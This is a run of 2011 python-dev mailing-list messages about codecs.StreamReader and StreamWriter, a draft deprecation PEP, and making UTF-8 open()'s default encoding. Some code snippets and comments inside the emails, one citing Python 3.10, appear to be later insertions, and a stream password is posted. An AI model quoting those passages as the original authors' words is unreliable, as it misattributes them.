 after the discussion on python-dev. Here is a more complete proposition
 as a PEP. It is a draft and I expect a lot of comments :)

The PEP's arguments for deprecating two essential codec design
components are very one-sided, comparing issues to features.

Please add all the comments I've made on the subject to the PEP.
The most important one missing is the major difference
that TextIOWrapper does not work on a per-codec basis, but
only on a per-stream basis.

By removing the StreamReader and StreamWriter API parts of the
codec design, you essentially make it impossible to add
per codec variations and optimizations that require full access
to the stream interface.

As mentioned before, many improvements are possible and lots of those
can build on TextIOWrapper and the incremental codec parts.

That said, I'm not really up for a longer discussion on this. We've
already had the discussion and decided against removing those
parts of the codec API.

Redirecting codecs.open() to open() should be investigated.

For the issues you mention in the PEP, please open tickets
or add ticket references to the PEP.

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com



 Victor
 
 ---
 
 PEP: xxx
 Title: Deprecate codecs.StreamReader and codecs.StreamWriter
 Version: $Revision$
 Last-Modified: $Date$
 Author: Victor Stinner
 Status: Draft
 Type: Standards Track
 Content-Type: text/x-rst
 Created: 28-May-2011
 Python-Version: 3.3
 
 
 Abstract
 
 
 io.TextIOWrapper and codecs.StreamReaderWriter offer the same API
 [#f1]_. TextIOWrapper has more features and is faster than
 StreamReaderWriter. Duplicate code means that bugs must be fixed
 twice and that there may be subtle differences between the two
 implementations.
 
 The codecs module was introduced in Python 2.0; see PEP 100. The
 io module was introduced in Python 2.6 and 3.0 (see the PEP 3116), and
 reimplemented in C in Python 2.7 and 3.1.
 
 
 Motivation
 ==
 
 When the Python I/O model was updated for 3.0, the concept of a
 stream-with-known-encoding was introduced in the form of
 io.TextIOWrapper. As this class is critical to the performance of
 text-based I/O in Python 3, this module has an optimised C version
 which is used by CPython by default. Many corner cases in handling
 buffering, stateful codecs and universal newlines have been dealt with
 since the release of Python 3.0.
 
 This new interface overlaps heavily with the legacy
 codecs.StreamReader, codecs.StreamWriter and codecs.StreamReaderWriter
 interfaces that were part of the original codec interface design in
 PEP 100. These interfaces are organised around the principle of an
 encoding with an associated stream (i.e. the reverse of arrangement in
 the io module), so the original PEP 100 design required that codec
 writers provide appropriate StreamReader and StreamWriter
 implementations in addition to the core codec encode() and decode()
 methods. This places a heavy burden on codec authors providing these
 specialised implementations to correctly handle many of the corner
 cases that have now been dealt with by io.TextIOWrapper. While deeper
 integration between the codec and the stream allows for additional
 optimisations in theory, these optimisations have in practice either
 not been carried out, or else the associated code duplication means
 that the corner cases that have been fixed in io.TextIOWrapper are
 still not handled correctly in the various StreamReader and
 StreamWriter implementations.
 
 Accordingly, this PEP proposes that:
 
 * codecs.open() be updated to delegate to the builtin open() in Python
   3.3;
 * the legacy codecs.Stream* interfaces, including the streamreader and
   streamwriter attributes of codecs.CodecInfo be deprecated in Python
   3.3 and removed in Python 3.4.
 
 
 Rationale
 =========
 
 StreamReader and StreamWriter issues
 ------------------------------------
 
  * StreamReader is unable to translate newlines.
  * StreamReaderWriter handles reads using StreamReader and writes
using StreamWriter. These two classes may be inconsistent. To stay
consistent, flush() must be 

Re: [Python-Dev] open(): set the default encoding to 'utf-8' in Python 3.3?

2011-06-29 Thread M.-A. Lemburg
Victor Stinner wrote:
 On Tuesday 28 June 2011 at 16:02 +0200, M.-A. Lemburg wrote:
 How about a more radical change: have open() in Py3 default to
 opening the file in binary mode, if no encoding is given (even
 if the mode doesn't include 'b') ?
 
 I tried your suggested change: Python doesn't start.

No surprise there: it's an incompatible change, but one that undoes
a wart introduced in the Py3 transition. Guessing encodings should
be avoided whenever possible.

 sysconfig uses the implicit locale encoding to read sysconfig.cfg, the
 Makefile and pyconfig.h. I think that it is correct to use the locale
 encoding for Makefile and pyconfig.h, but maybe not for sysconfig.cfg.
 
 Python requires more changes just to run make. I was able to run make
 by using encoding='utf-8' in various functions (of distutils and
 setup.py). I didn't try the test suite, I expect too many failures.

This demonstrates that Python's stdlib is still not being explicit
about the encoding issues. I suppose that things just happen to work
because we mostly use ASCII files for configuration and setup.

 --
 
 Then I tried my suggestion (use utf-8 by default): Python starts
 correctly, I can build it (run make) and... the full test suite pass
 without any change. (I'm testing on Linux, my locale encoding is UTF-8.)

I bet it would also work with ASCII in most cases, which just
means that the Python build process and test suite are not a good
test case for choosing a default encoding.

Linux is also a poor test candidate for this, since most user setups
will use UTF-8 as locale encoding. Windows, OTOH, uses all sorts of
code page encodings (usually not UTF-8), so you are likely to hit
the real problem cases a lot easier.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jun 29 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] open(): set the default encoding to 'utf-8' in Python 3.3?

2011-06-29 Thread M.-A. Lemburg
Victor Stinner wrote:
 On Wednesday 29 June 2011 at 10:18 +0200, M.-A. Lemburg wrote:
 Victor Stinner wrote:
  On Tuesday 28 June 2011 at 16:02 +0200, M.-A. Lemburg wrote:
 How about a more radical change: have open() in Py3 default to
 opening the file in binary mode, if no encoding is given (even
 if the mode doesn't include 'b') ?

 I tried your suggested change: Python doesn't start.

 No surprise there: it's an incompatible change, but one that undoes
 a wart introduced in the Py3 transition. Guessing encodings should
 be avoided whenever possible.
 
 It means that all programs written for Python 3.0, 3.1, 3.2 will stop
 working with the new 3.x version (let say 3.3). Users will have to
 migrate from Python 2 to Python 3.2, and then migration from Python 3.2
 to Python 3.3 :-(

I wasn't suggesting doing this for 3.3, but we may want to start
the usual feature change process to make the change eventually
happen.

 I would prefer a ResourceWarning (emitted if the encoding is not
 specified), hidden by default: it doesn't break compatibility, and
 -Werror gives exactly the same behaviour that you expect.

ResourceWarning is the wrong type of warning for this. I'd
suggest to use a UnicodeWarning or perhaps create a new
EncodingWarning instead.
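A hedged sketch of what such a warning might look like; the
EncodingWarning class and open_checked wrapper below are hypothetical,
not an existing API of that era (Python itself only grew a builtin
EncodingWarning much later, in 3.10 via PEP 597).

```python
import warnings

class EncodingWarning(UserWarning):
    # Hypothetical warning class along the lines suggested above;
    # a builtin of this name only appeared in Python 3.10 (PEP 597).
    pass

def open_checked(path, mode="r", encoding=None, **kwargs):
    # Hypothetical wrapper: warn when a text-mode open would silently
    # fall back to the locale's default encoding.
    if "b" not in mode and encoding is None:
        warnings.warn("no encoding specified; using the locale default",
                      EncodingWarning, stacklevel=2)
    return open(path, mode, encoding=encoding, **kwargs)
```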

 This demonstrates that Python's stdlib is still not being explicit
 about the encoding issues. I suppose that things just happen to work
 because we mostly use ASCII files for configuration and setup.
 
 I did more tests. I found some mistakes and sometimes the binary mode
 can be used, but most functions really expect the locale encoding (it is
 the correct encoding to read and write files). I agree that it would be
 nice to have an explicit encoding='locale', but making it mandatory is a
 little bit rude.

Again: Using a locale based default encoding will not work out
in the long run. We've had those discussions many times in the
past.

I don't think there's anything bad about requiring the user to
set an encoding if he wants to read text. It makes him/her
think twice about the encoding issue, which is good.

And, of course, the stdlib should start using this
explicit-is-better-than-implicit approach as well.
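A small demonstration of why the implicit locale default is risky
(the byte string is illustrative):

```python
import locale

# The fallback that open() uses when no encoding is given varies
# from machine to machine:
print(locale.getpreferredencoding(False))

# Why relying on it is dangerous: the same UTF-8 bytes, mis-read under
# a Latin-1 locale, decode without error into mojibake.
data = "café".encode("utf-8")
assert data.decode("utf-8") == "café"
assert data.decode("latin-1") == "cafÃ©"   # silent corruption, no exception
```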

 Then I tried my suggestion (use utf-8 by default): Python starts
 correctly, I can build it (run make) and... the full test suite pass
 without any change. (I'm testing on Linux, my locale encoding is UTF-8.)

 I bet it would also work with ASCII in most cases, which just
 means that the Python build process and test suite are not a good
 test case for choosing a default encoding.

 Linux is also a poor test candidate for this, since most user setups
 will use UTF-8 as locale encoding. Windows, OTOH, uses all sorts of
 code page encodings (usually not UTF-8), so you are likely to hit
 the real problem cases a lot easier.
 
 I also ran the test suite on my patched Python (open uses UTF-8 by
 default) with ASCII locale encoding (LANG=C), the test suite does also
 pass. Many tests use non-ASCII characters; some of them are skipped if
 the locale encoding is unable to encode the tested text.

Thanks for checking. So the build process and test suite are
indeed not suitable test cases for the problem at hand. With
just ASCII files to decode, Python will simply never fail
to decode the content, regardless of whether you use an ASCII,
UTF-8 or some Windows code page as locale encoding.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] open(): set the default encoding to 'utf-8' in Python 3.3?

2011-06-28 Thread M.-A. Lemburg
Victor Stinner wrote:
 In Python 2, open() opens the file in binary mode (e.g. file.readline()
 returns a byte string). codecs.open() opens the file in binary mode by
 default, you have to specify an encoding name to open it in text mode.
 
 In Python 3, open() opens the file in text mode by default. (It only
 opens in binary mode if the file mode contains 'b'.) The problem is
 that open() uses the locale encoding if the encoding is not specified,
 which is the case *by default*. The locale encoding can be:
 
  - UTF-8 on Mac OS X, most Linux distributions
  - ISO-8859-1 on some FreeBSD systems
  - ANSI code page on Windows, e.g. cp1252 (close to ISO-8859-1) in
 Western Europe, cp932 in Japan, ...
  - ASCII if the locale is manually set to an empty string or to C, or
 if the environment is empty, or by default on some systems
  - something different depending on the system and user configuration...
 
 If you develop under Mac OS X or Linux, you may have surprises when you
 run your program on Windows on the first non-ASCII character. You may
 not detect the problem if you only write text in English... until
 someone writes the first letter with a diacritic.

How about a more radical change: have open() in Py3 default to
opening the file in binary mode, if no encoding is given (even
if the mode doesn't include 'b') ?

That'll make it compatible with the Py2 world again and avoid
all the encoding guessing.

Making such default encodings depend on the locale has already
failed to work when we first introduced a default encoding in
Py2, so I don't understand why we are repeating the same
mistake again in Py3 (only in a different area).

Note that in Py2, Unix applications often leave out the 'b'
mode, since there's no difference between using it or not.
Only on Windows, you'll see a difference.

-- 
Marc-Andre Lemburg
eGenix.com



[Python-Dev] Python language summit on ustream.tv

2011-06-16 Thread M.-A. Lemburg
Dear Python Developers,

for the upcoming language summit at EuroPython, I'd like to
try out whether streaming such meetings would work. I'll setup
a webcam and stream the event live to a private channel on ustream.tv.

These are the details in case you want to watch:

URL: http://www.ustream.tv/channel/python-language-summit
PWD: fpmUtuL4

Date: Sunday, 2011-06-19
Time: 10:00 - 16:00 CEST with breaks

I'm not sure whether I can stream the whole summit, but at least
the morning session should be possible, provided the network
works on that day.

Interaction will likely be a bit difficult in case we have
heated discussions :-), but we'll keep the IRC channel
#python-language-summit on freenode open as well.

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] cpython: Remove some extraneous parentheses and swap the comparison order to

2011-06-07 Thread M.-A. Lemburg
Georg Brandl wrote:
 On 06/07/11 05:20, brett.cannon wrote:
 http://hg.python.org/cpython/rev/fc282e375703
 changeset:   70695:fc282e375703
 user:Brett Cannon br...@python.org
 date:Mon Jun 06 20:20:36 2011 -0700
 summary:
   Remove some extraneous parentheses and swap the comparison order to
 prevent accidental assignment.

 Silences a warning from LLVM/clang 2.9.
 
 Swapping the comparison order here seems a bit inconsistent to me. There are
 lots of others around (e.g. len == 0 in the patch context below). Why is
 this one so special?

 I think that another developer even got told off once for these kinds of
 comparisons.

 I hope the Clang warning is only about the parentheses.

I agree with Georg: if ('u' == typecode) is not very readable,
since you usually put the variable part on the left and the constant
part on the right of an equality comparison.

If clang warns about this, clang needs to be fixed, not our
C code :-)

 Georg
 
 files:
   Modules/arraymodule.c |  2 +-
   1 files changed, 1 insertions(+), 1 deletions(-)


 diff --git a/Modules/arraymodule.c b/Modules/arraymodule.c
 --- a/Modules/arraymodule.c
 +++ b/Modules/arraymodule.c
 @@ -2091,7 +2091,7 @@
  if (len == 0) {
  return PyUnicode_FromFormat("array('%c')", (int)typecode);
  }
 -if ((typecode == 'u'))
 +if ('u' == typecode)
  v = array_tounicode(a, NULL);
  else
  v = array_tolist(a, NULL);
 
 
 

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-27 Thread M.-A. Lemburg
Victor Stinner wrote:
 On Wednesday 25 May 2011 at 15:43 +0200, M.-A. Lemburg wrote:
 For UTF-16 it would e.g. make sense to always read data in blocks
 with even sizes, removing the trial-and-error decoding and extra
 buffering currently done by the base classes. For UTF-32, the
 blocks should have size % 4 == 0.

 For UTF-8 (and other variable length encodings) it would make
 sense looking at the end of the (bytes) data read from the
 stream to see whether a complete code point was read or not,
 rather than simply running the decoder on the complete data
 set, only to find that a few bytes at the end are missing.
 
 I think that the readahead algorithm is much faster than trying to
 avoid partial input, and it's not a problem to have partial input if you
 use an incremental decoder.

Depends on where you're coming from. For non-seekable streams
such as sockets or pipes, readahead is not going to work.

For seekable streams, I agree that readahead is better strategy.

And of course, it also makes sense to use incremental decoders
for these encodings.
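For reference, a sketch of how an incremental decoder copes with a
chunk boundary that splits a multi-byte sequence (the sample string is
illustrative):

```python
import codecs

# An incremental decoder buffers a trailing partial sequence itself,
# so the caller may split the byte stream at any point.
dec = codecs.getincrementaldecoder("utf-8")()

data = "héllo".encode("utf-8")            # b'h\xc3\xa9llo'
out = dec.decode(data[:2])                # cuts through the 2-byte 'é'
out += dec.decode(data[2:], final=True)
assert out == "héllo"
```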

 For single character encodings, it would make sense to prefetch
 data in big chunks and skip all the trial and error decoding
 implemented by the base classes to address the above problem
 with variable length encodings.
 
 TextIOWrapper implements this optimization using its readahead
 algorithm.

It does yes, but the above was an optimization specific
to single character encodings, not all encodings and
TextIOWrapper doesn't know anything about specific characteristics
of the underlying encodings (except perhaps a few special
cases).

 That's somewhat unfair: TextIOWrapper is implemented in C,
 whereas the StreamReader/Writer subclasses used by the
 codecs are written in Python.

 A fair comparison would use the Python implementation of
 TextIOWrapper.
 
 Do you mean that you would like to reimplement codecs in C? 

As use of Unicode codecs increases in Python applications,
this would certainly be an approach to consider, yes.

Looking at the current situation, it is better to use
TextIOWrapper as it provides better performance, but since
TextIOWrapper cannot (by design) provide per-codec optimizations,
this is likely to change with a codec rewrite in C of codecs
that benefit a lot from such specific optimizations.

 It is not
 relevant to compare codecs and _pyio, because codecs reuses
 BufferedReader (of the io module, not of the _pyio module), and io is
 the main I/O module of Python 3.

They both use whatever stream you pass in as parameter,
so your TextIOWrapper benchmark will also use the BufferedReader
of the io module.

The point here is to compare Python to Python, not Python
to C.

 But well, as you want, here is a benchmark comparing:
_pyio.TextIOWrapper(io.open(filename, 'rb'), encoding)
 and 
 codecs.open(filename, encoding)
 
 The only change with my previous bench.py script is the test_io()
 function :
 
 def test_io(test_func, chunk_size):
     with open(FILENAME, 'rb') as buffered:
         f = _pyio.TextIOWrapper(buffered, ENCODING)
         test_file(f, test_func, chunk_size)
         f.close()

Thanks for running those tests.

 (1) Decode Objects/unicodeobject.c (317336 characters) from utf-8
 
 test_io.readline(): 1193.4 ms
 test_codecs.readline(): 1267.9 ms
 - codecs 6% slower than io
 
 test_io.read(1): 21696.4 ms
 test_codecs.read(1): 36027.2 ms
 - codecs 66% slower than io
 
 test_io.read(100): 3080.7 ms
 test_codecs.read(100): 3901.7 ms
 - codecs 27% slower than io

This shows that StreamReader/Writer could benefit quite
a bit from using incremental encoders/decoders.

 test_io.read(): 3991.0 ms
 test_codecs.read(): 1736.9 ms
 - codecs 130% FASTER than io

No surprise here. It's also a very common use case
to read the whole file in one go and the bigger
the file, the more impact this has.

 (2) Decode README (6613 characters) from ascii
 
 test_io.readline(): 678.1 ms
 test_codecs.readline(): 760.5 ms
 - codecs 12% slower than io
 
 test_io.read(1): 13533.2 ms
 test_codecs.read(1): 21900.0 ms
 - codecs 62% slower than io
 
 test_io.read(100): 2663.1 ms
 test_codecs.read(100): 3270.1 ms
 - codecs 23% slower than io
 
 test_io.read(): 6769.1 ms
 test_codecs.read(): 3919.6 ms
 - codecs 73% FASTER than io

See above.

 (3) Decode Lib/test/cjkencodings/gb18030.txt (501 characters) from
 gb18030
 
 test_io.readline(): 38.9 ms
 test_codecs.readline(): 15.1 ms
 - codecs 157% FASTER than io
 
 test_io.read(1): 369.8 ms
 test_codecs.read(1): 302.2 ms
 - codecs 22% FASTER than io
 
 test_io.read(100): 258.2 ms
 test_codecs.read(100): 155.1 ms
 - codecs 67% FASTER than io
 
 test_io.read(): 1803.2 ms
 test_codecs.read(): 1002.9 ms
 - codecs 80% FASTER than io

These results are interesting since gb18030 is a shift
encoding which keeps state in the encoded data stream, so
the strategy chosen by TextIOWrapper doesn't work out that
well.

It hints to what I mentioned above: per codec optimizations
are going to be relevant once

Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-27 Thread M.-A. Lemburg
Victor Stinner wrote:
 On Friday 27 May 2011 at 10:17:29, M.-A. Lemburg wrote:
 I am still -1 on deprecating the StreamReader/Writer parts of
 the codec APIs. I've given numerous reasons on why these are
 useful, what their intention is, why they were added to Python 1.6.
 
 codecs.open() now uses TextIOWrapper, so there is no good reason to keep 
 StreamReader or StreamWriter. You did not give me any use case where 
 StreamReader or StreamWriter should be used instead of TextIOWrapper. You 
 only 
 listed theoretical optimizations.
 
 You have until the release of Python 3.3 to prove that StreamReader and/or 
 StreamWriter can be faster than TextIOWrapper. If you can prove it using a 
 patch and a benchmark, I will be ok to revert my commit.

Victor, please revert the change. It has *not* been approved !

If we'd go by your reasoning for deprecating and eventually
removing parts of the stdlib or Python's subsystems, we'll end
up with a barebone version of Python. That's not what we want
and it's not what our users want.

I have tried to explain the design decisions and reasons for
those codec APIs at great length. You've pretty much used up
my patience. If you are not going to revert the patch, I will.

 Since such a deprecation would change an important documented API,
 please write a PEP outlining your reasoning, including my comments,
 use cases and possibilities for optimizations.
 
 Ok, I will write on a PEP explaining why StreamReader and StreamWriter are 
 deprecated.

Wrong order: first write a PEP, then discuss, then get approval,
then patch.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-27 Thread M.-A. Lemburg
Victor Stinner wrote:
 On Friday 27 May 2011 at 15:42:10, M.-A. Lemburg wrote:
 If we'd go by your reasoning for deprecating and eventually
 removing parts of the stdlib or Python's subsystems, we'll end
 up with a barebone version of Python. That's not what we want
 and it's not what our users want.
 
 I don't want to deprecate the whole stdlib, just duplicated old APIs, to follow
 import this mantra:
 
 There should be one-- and preferably only one --obvious way to do it.

What people tend to miss in this mantra is the last part: obvious.
It doesn't say: there should only be one way to do it. There can
be many ways, but there should preferably be only one *obvious* way.

Using codecs.open() is not obvious in Python3, since the standard
open() already provides a way to access an encoded stream. Using
a builtin is the obvious way to go.

It is obvious in Python2 where the standard open() doesn't provide a
way to define an encoding, so the user has to explicitly look for this
kind of API and then find it in the obvious (to some extent)
codecs module, since that's where encodings happen in Python2.

Having multiple ways to do things is the most natural thing
on earth and it's good that way.

Python does not and should not force people into doing things
in one dictated right way. It should, however, provide
natural choices and obvious hints to find a good solution.
And that's what the Zen mantra is all about.

 It's difficult for a user to choose between open() and codecs.open().

As I mentioned on the ticket and in my replies: I'm not against
changing codecs.open() to use a variant that is based on TextIOWrapper,
provided there are no user noticeable compatibility issues.

Thanks for reverting the patch.

Have a nice weekend,
-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-25 Thread M.-A. Lemburg
Walter Dörwald wrote:
 On 24.05.11 12:58, Victor Stinner wrote:
 On Tuesday 24 May 2011 at 12:42 +0200, Łukasz Langa wrote:
 Message written by Walter Dörwald on 2011-05-24, at 12:16:

 I don't see which usecase is not covered by TextIOWrapper. But I know
 some cases which are not supported by StreamReader/StreamWriter.

  This could be partially fixed by implementing generic
  StreamReader/StreamWriter classes that reuse the incremental codecs, but
  I don't think that's worth it.

 Why not?

 We have already an implementation of this idea, it is called
 io.TextIOWrapper.
 
 Exactly.
 
 From another post by Victor:
 
 As I wrote, codecs.open() is useful in Python 2. But I don't know any
 program or library using directly StreamReader or StreamWriter.
 
 So: implementing this is a lot of work, duplicates existing
 functionality and is mostly unused.

You are missing the point: we have StreamReader and StreamWriter APIs
on codecs to allow each codecs to implement more efficient ways of
encoding and decoding streams.

Examples of such optimizations are reading the stream in
chunks that can be decoded in one piece, or writing to the stream
in a way that doesn't generate encoding state problems on the
receiving end by ending transmission half-way through a
shift block.

Of course, you won't find many direct uses of these APIs, since
most of the time, applications will simply use codecs.open() to
automatically benefit from these optimizations.

OTOH, TextIOWrapper doesn't know anything about specific encodings
and thus does not allow for such optimizations to be implemented
by codecs.

We don't have many such specialized implementations in the stdlib,
but this doesn't mean that there's no use for them. It
just means that developers and users are simply unaware of the
possibilities opened by these stateful stream APIs.
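The two spellings under discussion, side by side (an in-memory stream
is used for illustration):

```python
import codecs
import io

raw = io.BytesIO("stream data: äöü\n".encode("utf-8"))

# Codec-centric spelling: the codec package supplies the reader class.
reader = codecs.getreader("utf-8")(raw)
assert reader.read() == "stream data: äöü\n"

raw.seek(0)

# io-centric spelling: one generic wrapper driven by incremental codecs.
wrapped = io.TextIOWrapper(raw, encoding="utf-8")
assert wrapped.read() == "stream data: äöü\n"
```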

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-25 Thread M.-A. Lemburg
Victor Stinner wrote:
 On Wednesday 25 May 2011 at 11:38 +0200, M.-A. Lemburg wrote:
 You are missing the point: we have StreamReader and StreamWriter APIs
 on codecs to allow each codecs to implement more efficient ways of
 encoding and decoding streams.

 Examples of such optimizations are reading the stream in
 chunks that can be decoded in one piece, or writing to the stream
 in a way that doesn't generate encoding state problems on the
 receiving end by ending transmission half-way through a
 shift block.

 ...

 We don't have many such specialized implementations in the stdlib,
 but this doesn't mean that there's no use for them. It
 just means that developers and users are simply unaware of the
 possibilities opened by these stateful stream APIs.
 
 Does at least one codec implement such implementation in its
 StreamReader or StreamWriter class? And can't we implement such
 optimization in incremental encoders and decoders (or in TextIOWrapper)?

I don't see how, since you need control over the file API methods
in order to implement such optimizations. OTOH, adding lots of
special cases to TextIOWrapper isn't a good idea either, since these
optimizations would then only trigger for a small number of
codecs and completely leave out 3rd party codecs.

 I checked all multibyte codecs (UTF and CJK codecs) and I don't see any
 of such optimization. UTF codecs handle the BOM, but don't have anything
 looking like an optimization. CJK codecs use multibytecodec,
 MultibyteStreamReader and MultibyteStreamWriter, which don't look to be
 optimized. But I missed maybe something?

No, you haven't missed such per-codec optimizations. The base classes
implement general purpose support for reading from streams in
chunks, but the support isn't optimized per codec.

For UTF-16 it would e.g. make sense to always read data in blocks
with even sizes, removing the trial-and-error decoding and extra
buffering currently done by the base classes. For UTF-32, the
blocks should have size % 4 == 0.

For UTF-8 (and other variable length encodings) it would make
sense looking at the end of the (bytes) data read from the
stream to see whether a complete code point was read or not,
rather than simply running the decoder on the complete data
set, only to find that a few bytes at the end are missing.

For single character encodings, it would make sense to prefetch
data in big chunks and skip all the trial and error decoding
implemented by the base classes to address the above problem
with variable length encodings.

Finally, all this could be implemented in C, reducing the
Python call overhead dramatically.
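As an illustration (not stdlib code), the UTF-16 idea could be sketched
in Python as a reader that only ever requests an even number of bytes,
with an incremental decoder absorbing any remaining split; the function
name and chunk size are assumptions for the sketch.

```python
import codecs
import io

def read_utf16_chunks(stream, chunk_size=4096):
    """Yield decoded text, always requesting an even number of bytes."""
    chunk_size -= chunk_size % 2          # keep reads 2-byte aligned
    dec = codecs.getincrementaldecoder("utf-16-le")()
    while True:
        data = stream.read(chunk_size)
        if not data:
            break
        yield dec.decode(data)
    tail = dec.decode(b"", final=True)    # flush any buffered bytes
    if tail:
        yield tail

buf = io.BytesIO("chunked \u2713 text".encode("utf-16-le"))
assert "".join(read_utf16_chunks(buf, chunk_size=6)) == "chunked \u2713 text"
```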

 TextIOWrapper has an advanced buffer algorithm to prefetch (readahead)
 some bytes at each read to speed up small reads. It is difficult to
 implement such algorithm, but it's done and it works.
 
 --
 
 Ok, let's stop talking about theoretical optimizations, and let's do a
 benchmark to compare the codecs and io modules on reading files!

That's somewhat unfair: TextIOWrapper is implemented in C,
whereas the StreamReader/Writer subclasses used by the
codecs are written in Python.

A fair comparison would use the Python implementation of
TextIOWrapper.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-24 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 In Python 2, codecs.open() is the best way to read and/or write files
 using Unicode. But in Python 3, open() is preferred with its fast io
 module. I would like to deprecate codecs.open() because it can be
 replaced by open() and io.TextIOWrapper. I would like your opinion and
 that's why I'm writing this email.

I think you should have moved this part of your email
further up, since it explains the reason why this idea was
rejected for now:

 I opened an issue for this idea. Brett and Marc-Andre Lemburg don't
 want to deprecate codecs.open() & friends because they want to be able
 to write code working on Python 2 and on Python 3 without any change. I
 don't think it's realistic: nontrivial programs require at least the six
 module, and most likely the 2to3 program. The six module can have its
 codecs.open function if codecs.open is removed from Python 3.4.

And now for something completely different:

 codecs.open() and StreamReader, StreamWriter and StreamReaderWriter
 classes of the codecs module don't support universal newlines, still
 have some issues with stateful codecs (like UTF-16/32 BOMs), and each
 codec has to implement a StreamReader and a StreamWriter class.
 
 StreamReader and StreamWriter are stateless codecs (no reset() or
 setstate() method), and so it's not possible to write a generic fix for
 all child classes in the codecs module. Each stateful codec has to
 handle special cases like seek() problems. For example, UTF-16 codec
 duplicates some IncrementalEncoder/IncrementalDecoder code into its
 StreamWriter/StreamReader class.

Please read PEP 100 regarding StreamReader and StreamWriter.
Those codecs parts were explicitly designed to be stateful,
unlike the stateless encoder/decoder methods.

Please read my reply on the ticket:


StreamReader and StreamWriter classes provide the base codec
implementations for stateful interaction with streams. They
define the interface and provide a working implementation for
those codecs that choose not to implement their own variants.

Each codec can, however, implement variants which are optimized
for the specific encoding or intercept certain stream methods
to add functionality or improve the encoding/decoding
performance.

Both are essential parts of the codec interface.

TextIOWrapper and StreamReaderWriter are merely wrappers
around streams that make use of the codecs. They don't
provide any codec logic themselves. That's the conceptual
difference.


 The io module is well tested, supports non-seekable streams, handles
 correctly corner-cases (like UTF-16/32 BOMs) and supports any kind of
 newlines including an universal newline mode. TextIOWrapper reuses
 incremental encoders and decoders, so BOM issues were fixed only once,
 in TextIOWrapper.
 
 It's trivial to replace a call to codecs.open() by a call to open(),
 because the two APIs are very close. The main difference is that
 codecs.open() doesn't support universal newlines, so you have to use
 open(..., newline='') to keep the same behaviour (keep newlines
 unchanged). This task can be done by 2to3. But I suppose that most
 people will be happy with the universal newline mode.
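The equivalence described in the quoted text can be checked directly: with `newline=''`, the built-in open() matches codecs.open()'s behaviour of leaving newlines untouched.

```python
import codecs
import os
import tempfile

path = os.path.join(tempfile.mkdtemp(), "demo.txt")
# Write a file with mixed line endings, untranslated.
with open(path, "w", encoding="utf-8", newline="") as f:
    f.write("line one\r\nline two\n")

# codecs.open() performs no newline translation at all.
with codecs.open(path, "r", encoding="utf-8") as f:
    via_codecs = f.read()

# open() with newline='' disables universal-newline translation,
# matching codecs.open().
with open(path, "r", encoding="utf-8", newline="") as f:
    via_open = f.read()

assert via_codecs == via_open == "line one\r\nline two\n"
```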
 
 I don't see which usecase is not covered by TextIOWrapper. But I know
 some cases which are not supported by StreamReader/StreamWriter.

This is a misunderstanding of the concepts behind the two.

StreamReader and StreamWriters are implemented by the codecs,
they are part of the API that each codec has to provide in order
to register in the Python codecs system. Their purpose is
to provide a stateful interface and work efficiently and
directly on streams rather than buffers.

Here's my reply from the ticket regarding using incremental
encoders/decoders for the StreamReader/Writer parts of the
codec set of APIs:


The point about having them use incremental codecs for encoding and
decoding is a good one and would need to be investigated. If possible,
we could use incremental encoders/decoders for the standard
StreamReader/Writer base classes or add new
IncrementalStreamReader/Writer classes which then use the
IncrementalEncoder/Decoder per default.

Please open a new ticket for this.


 StreamReader, StreamWriter, StreamReaderEncoder and EncodedFile are not
 used in the Python 3 standard library. I tried removing them: except for
 the tests in test_codecs which test them directly, the full test suite passes.

 Read the issue for more information: http://bugs.python.org/issue8796

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, May 24 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   27 days to go

::: Try our new mxODBC.Connect Python Database Interface 

Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-24 Thread M.-A. Lemburg
Victor Stinner wrote:
 Le mardi 24 mai 2011 à 10:03 +0200, M.-A. Lemburg a écrit :
 Please read PEP 100 regarding StreamReader and StreamWriter.
 Those codecs parts were explicitly designed to be stateful,
 unlike the stateless encoder/decoder methods.
 
 Yes, it is possible to implement stateful StreamReader and StreamWriter
 classes and we have such codecs (I gave the example of UTF-16), but the
 state is not exposed (getstate / setstate), and so it's not possible to
 write generic code to handle the codec state in the base StreamReader
 and StreamWriter classes. io.TextIOWrapper requires encoder.setstate(0)
 for example.
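The state handling described above can be seen with the incremental UTF-16 codec, which does expose getstate()/setstate(); the setstate(0) call is how a wrapper tells the encoder that the BOM has already been written:

```python
import codecs

enc = codecs.getincrementalencoder("utf-16")()
first = enc.encode("a")    # 2-byte BOM + one 2-byte code unit
second = enc.encode("b")   # stateful: the BOM is emitted only once
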